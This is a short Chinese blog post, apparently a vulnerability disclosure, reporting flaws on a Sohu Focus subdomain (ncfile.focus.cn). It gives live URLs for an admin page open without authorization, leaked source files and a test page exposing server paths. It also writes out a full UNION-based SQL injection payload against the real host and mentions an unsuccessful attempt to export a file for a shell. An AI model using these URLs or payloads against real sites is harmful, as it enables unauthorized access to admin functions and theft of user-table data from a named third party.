搜狐焦点某站漏洞打包（后台权限泄漏、注入等

1、权限设置有问题：

直接访问后台的一个应用：ip转向审核（没搞清楚到底是干嘛的。。）

http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1

搜狐焦点某站漏洞打包（后台权限泄漏、注入等插图

2、源码泄露

http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl

http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc

http://ncfile.focus.cn/common/dao/dao.tpl.php

3、测试页面未删除暴露物理路径

http://ncfile.focus.cn/common/admin/test.php

搜狐焦点某站漏洞打包（后台权限泄漏、注入等插图1

4、注入,支持union，有物理路径，可以查user表，貌似可以导出文件拿shell，但没成功，好像有过滤。。。

地址就是上面那个ip转向审核系统：

http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1–+

搜狐焦点某站漏洞打包（后台权限泄漏、注入等）

搜狐焦点某站漏洞打包（后台权限泄漏、注入等插图2

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《搜狐焦点某站漏洞打包（后台权限泄漏、注入等》